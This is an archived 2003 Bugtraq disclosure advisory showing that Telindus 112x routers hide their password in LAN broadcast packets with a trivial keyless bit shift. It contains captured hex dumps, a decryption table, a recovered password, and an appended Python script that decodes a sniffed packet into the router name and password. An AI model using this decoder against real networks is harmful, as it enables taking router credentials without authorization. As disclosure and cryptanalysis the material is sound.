Bugtraq mailing list archives

Weak Encryption Scheme in Telindus 112x


From: <eflorio () edmaster it>
Date: 23 Feb 2003 11:42:36 -0000



[-----------------------------------------------------------------------]
Product Name: TELINDUS ADSL ROUTER 112x
Severity    : Low Risk
Remote      : No
Category    : Trivial encryption scheme can reveal router system password
Exploit     : No
Vendor URL  : http://www.telindus.com
Author      : Elia Florio
Discov.-Date: December 10, 2002
Status      : Telindus was contacted in December, 2002
[-----------------------------------------------------------------------]

INTRO:
An old security problem for Telindus 112x series (and Arescom NetDSL 1000
too) is well documented here:

http://www.tigerteam.it/files/telindus-advisory.txt       (english)
http://www.tigerteam.it/files/telindus-advisory.IT.txt    (italian)

There is a new exploit to recover the router password, partly based on 
this old problem. Telindus fixed the old problem by introducing a new 
firmware release (6.0.x), in which the UDP packets on port 9833 
(which carry the plain-text password) are encrypted, to ensure product 
security.

However, after some study, I discovered that the encryption scheme is 
trivial and can be broken using information which the router itself 
reveals to the user (the router name). 

NOTE:
The encryption scheme was successfully decrypted on 2 routers supplied 
by different ISPs: MATAV (Hungary) and Telecom (Italy), both with 6.0.x
firmware.


[---------------------------------------------------------------------]

PROOF OF CONCEPT:

Using a sniffer I captured an (encrypted) packet from a 1124 router and
compared it with another (unencrypted) packet taken from another router, 
which has the old firmware (< 6.0.x). This procedure (how to capture the 
packet) was explained in a previous security advisory (by others) and is 
based on sniffing UDP on port 9833 while "Telindus 9100 M. 
Application" is trying to contact the router over the LAN.

                            CYPHER-TEXT

0100  00 03 02 00 08 00 00 A2 A3 2B 63 4B 73 23 AB 99    .......¢£+cKs#«TM
0110  02 0A 22 9A 61 02 93 7B AB A3 2B 90 08 08 00 2B    .."sa."{«£+·...+
0120  6B 7B AB 9B 28 08 10 01 92 72 22 99 89 91 B1 82    k{«>(...'r"TM`±,
0130  42 29 6A A2 62 49 61 03 B3 2B 91 01 B1 71 81 71    B)j¢bIa.³+`.±q·q
0140  91 B9 DA A3 AB 29 02 53 AB 61 01 99 81 01 89 C9    `¹Ú£«).S«a.TM·.É
0150  D1 89 B1 D1 99 B1 01 91 81 81 90 09 98 00 10 01    ѱÑTM±.`···.~...
0160  E0 08 98 00 30 00 2E C0 9F 0A 88 08 B0 00 30 00    à.~.0..ÀY.^.°.0.
0170  85 38 9A 64 0A 00 18 00 10 00 02 00 20 00 10 00    ...8sd........ ..
0180  00 09 30 00 00 09 38 00 00 09 40 00 00 09 80 00    ..0...8...@....
0190  10 00 10 0A 20 00 00 08 20 00 10 00 00 10 50 00    .... ... .....P.
01A0  10 00 00 0A 30 00 10 00 00 0A 48 00 20 00 00 00    ....0.....H. ...
01B0  00 0A 88 00 02 10 28 00 02 11 10 00 00 20 40 00    ..^...(...... @.

                            PLAIN-TEXT

0100  00 03 00 01 01 00 00 05-44 53 4C 30 30 01 01 00   ........DSL00...
0110  0D 31 31 31 31 31 31 31-31 31 31 31 31 31 01 02   .1111111111111..
0120  00 32 4E 44 31 30 36 30-56 45 2D 54 4C 49 2C 20   .2ND1060VE-TLI,
0130  76 65 72 20 35 2E 33 2E-31 31 42 3B 54 68 75 20   ver 5.3.11B;Thu
0140  44 65 63 20 20 36 20 31-36 3A 33 36 3A 33 33 20   Dec  6 16:36:33
0150  32 30 30 31 01 33 00 02-00 3C 01 13 00 06 00 60   2001.3...<.....`
0160  6C 1D BD 7E 01 16 00 06-00 00 86 60 62 F7 04 08   l..~.......`b...
0170  00 02 00 01 04 15 00 02-00 FF 01 0D 00 04 00 00   ................
0180  00 00 01 0E 00 04 00 00-00 00 01 14 00 02 00 00   ................
0190  40 03 00 02 00 00 40 04-00 02 00 00 01 26 00 00   @.....@......&..
01A0  01 27 00 00 01 28 00 00-01 30 00 02 00 02 01 44   .'...(...0.....D
01B0  00 00 42 05 00 00 42 22-00 00 04 18 00 00 08 FF   ..B...B"........

Both payloads begin with the byte sequence "00 03 xx xx xx 00 00".

In the plain packet we can read the router name and the password: each 
text string is preceded by an important byte, which stores the string 
length:

05-44 53 4C 30 30 01 01 00
^^----------------------------------> length of string "DSL00"

0D 31 31 31 31 31 31 31-31 31 31 31 31 31 01 02 00
^^----------------------------------> length of string "1111111111111"

I suppose that "0x 0x 00" is a kind of termination sequence
for <router name> and <password> fields.

Now look at the encrypted packet: because its total length is similar
to that of the plain packet (>200 bytes), I suppose that "A2" is now an 
encrypted length byte, so the router name field begins after this byte.

But I know the router name, because Telindus 9100 M. Application
shows it to me during the connection test with the router.
In this case it was "Telindus ADSL Router", very long! I think that is 
enough to begin a cryptanalytic attack on the packet.


"Telindus ADSL Router" [20 bytes = 14h]  crypto-length=A2

T  e  l  i  n  d  u  s     A  D  S  L     R  o  u  t  e  r 
A3 2B 63 4B 73 23 AB 99 02 0A 22 9A 61 02 93 7B AB A3 2B 90  encrypted
54 65 6C 69 6E 64 75 73 20 41 44 53 4C 20 52 6F 75 74 65 72  plain ASCII


Looking at this, I suppose that:

1) the encryption scheme is based on a fixed crypto system 
   ("e", "u", "t" are encrypted in same way in the text)

2) there is a special encryption for stop/mark bytes between 
   words (add -2 or -3 to final char R=93 / r=90 ????)

3) the encryption scheme is case sensitive

Trying to write a crypto table, I notice that every letter is coded 
from the previous one by adding 8 to the crypto byte. For example r=93, 
then s=9B...

CRYPTO TABLE (hex codes)
-------------------------------------
CHAR    CRYPT    PLAIN
a       0B       61
b       13       62
c       1B       63
d       23       64
e       2B       65
f       33       66
g       3B       67
h       43       68
i       4B       69
j       53       6A
k       5B       6B
l       63       6C
m       6B       6D
n       73       6E
o       7B       6F
p       83       70
q       8B       71
r       93       72
s       9B       73
t       A3       74
u       AB       75
v       B3       76
w       BB       77
x       C3       78
y       CB       79
z       D3       7A
... 
1       89       31
2       91       32
3       98       33
...

I think that the encryption function is very similar to this :

ENCRYPT(x) = x*8 + int(x/20h) - (int(x/20h))*100h

For example ("q" = 71h)

ENCRYPT(71h) = 71h*8 + 71h/20h - (71h/20h)*100h = 388h + 3 - 300h = 8Bh

There are some encryption variants for blank space, capital
and the last letters of words.

Now, where is the router password in the encrypted packet?
After 20 bytes (the router name length in this case) there is "08 08 00", 
probably a field marker, then there is 2B, which is 
the crypto-length of the password. 

The encrypted password string begins there.

Using the table, I can unmask the real router password:

   m  o  u  s  e  
2B 6B 7B AB 9B 28 08 10 01 
^^----------------------------------crypto length of password


Other information can also be decrypted:

N  D  S  1  2  6  0  H  E  -  T  L  I
72 22 99 89 91 B1 82 42 29 6A A2 62 49 61 03 

v  e  r     6  .  0  .  2  7     T  u  e     J  u  l     3  0     
B3 2B 91 01 B1 71 81 71 91 B9 DA A3 AB 29 02 53 AB 61 01 99 81 01 

1  9  :  1  6  :  3  6     2  0  0  2
89 C9 D1 89 B1 D1 99 B1 01 91 81 81 90 09 98 00 10 01
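As an added example (not part of the advisory, and not Telindus' or the author's code), the Python below implements the ENCRYPT() formula given above and its inverse, regenerates the crypto table from it, and checks the result against the bytes of the two dumps. It also goes one step beyond the advisory: treating the transform as a 3-bit left shift of the whole payload as one bit string, so that each ciphertext byte takes its low three bits from the next plaintext byte, reproduces every byte of the dump from A2 onward, field separators and the "variants" for blanks and capitals included. That stream model is an inference from the dumps on this page, not something the advisory states. The only input is the first 96 bytes of the CYPHER-TEXT dump, copied verbatim.

```python
# Added example, not part of the advisory and not Telindus' or the author's
# code.  It implements ENCRYPT() exactly as written in the advisory, its
# inverse, and a whole-stream model inferred from the two hex dumps, then
# checks each one against the captured bytes.  Every input is copied from
# the dumps above.

from typing import Dict, List

# Rows 0100-0150 of the CYPHER-TEXT dump above (first 96 bytes), verbatim.
CIPHER = bytes.fromhex(
    "00 03 02 00 08 00 00 A2 A3 2B 63 4B 73 23 AB 99 "
    "02 0A 22 9A 61 02 93 7B AB A3 2B 90 08 08 00 2B "
    "6B 7B AB 9B 28 08 10 01 92 72 22 99 89 91 B1 82 "
    "42 29 6A A2 62 49 61 03 B3 2B 91 01 B1 71 81 71 "
    "91 B9 DA A3 AB 29 02 53 AB 61 01 99 81 01 89 C9 "
    "D1 89 B1 D1 99 B1 01 91 81 81 90 09 98 00 10 01 "
)


def encrypt_byte(x: int) -> int:
    """ENCRYPT(x) = x*8 + int(x/20h) - int(x/20h)*100h, as given in the advisory.
    Algebraically that is an 8-bit rotate-left by 3: the low five bits move up,
    the high three bits wrap round to the bottom.  No key is involved."""
    q = x // 0x20
    return x * 8 + q - q * 0x100


def decrypt_byte(c: int) -> int:
    """Inverse of encrypt_byte: rotate-right by 3."""
    return (c >> 3) | ((c & 0x07) << 5)


def crypto_table() -> Dict[str, int]:
    """Regenerates the advisory's CRYPTO TABLE for a-z and 0-9."""
    chars = [chr(x) for x in range(0x61, 0x7B)] + [chr(x) for x in range(0x30, 0x3A)]
    return {ch: encrypt_byte(ord(ch)) for ch in chars}


def shift_stream_decrypt(cipher: bytes, prev: int = 0) -> bytes:
    """Stream model (inferred from the dumps; the advisory does not state it):
    the payload is shifted left by three bits as one long bit string, so
    c[i] = (p[i] << 3 | p[i+1] >> 5) & 0xFF.  The high three bits of p[i]
    therefore sit in the low three bits of c[i-1]; `prev` supplies them for
    the first byte.  This one rule also yields the 'variants' for blanks,
    capitals and last letters that the single-byte table cannot explain."""
    out = bytearray()
    for c in cipher:
        out.append(((prev & 0x07) << 5) | (c >> 3))
        prev = c
    return bytes(out)


def shift_stream_encrypt(plain: bytes, nxt: int = 0) -> bytes:
    """Forward direction of the stream model; `nxt` is the byte that would
    follow the last plaintext byte (its top three bits spill into the output)."""
    out = bytearray()
    for i, p in enumerate(plain):
        follow = plain[i + 1] if i + 1 < len(plain) else nxt
        out.append(((p << 3) | (follow >> 5)) & 0xFF)
    return bytes(out)


def parse_fields(plain: bytes) -> List[bytes]:
    """Walks the length-prefixed strings the advisory describes: a length byte,
    the string, then the three-byte 'xx xx 00' separator."""
    fields: List[bytes] = []
    off = 0
    while off < len(plain):
        n = plain[off]
        s = plain[off + 1 : off + 1 + n]
        if len(s) < n:          # the dump is cut off in the middle of a field
            break
        fields.append(s)
        off += 1 + n + 3
    return fields


def recover_fields(cipher: bytes = CIPHER, start: int = 7) -> List[str]:
    """Decrypts from the 'A2' length byte (offset 7 in the dump) onward, taking
    the missing high bits of that byte from the preceding ciphertext byte, and
    returns the router name, the password and the version/date string."""
    plain = shift_stream_decrypt(cipher[start:], prev=cipher[start - 1])
    return [f.decode("latin-1") for f in parse_fields(plain)]


if __name__ == "__main__":
    print("ENCRYPT(71h) = %02Xh" % encrypt_byte(0x71))
    for i, f in enumerate(recover_fields(), 1):
        print("field %d: %r" % (i, f))
```

The single-byte formula and the stream rule agree whenever a byte and the one after it share the same top three bits (two lowercase letters, for instance), which is why the table works for most of the name and password; where they differ (a capital followed by a lowercase letter, a letter followed by a blank or a separator) the stream rule explains the off-by-one "variants": "T" is A3 in "Tue" but A2 in "TLI". Either way the transform is a fixed, keyless bit shift, so the password is recoverable from a single captured packet without any secret; the only real mitigation is a transport that carries a proper key, not a different shuffle of the bits.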

[----------------------------------------------------------------------]

Copyright Elia Florio
Security Researcher - Italy
"ioProgrammo" (www.edmaster.it/ioprogrammo)
(eflorio () edmaster it)

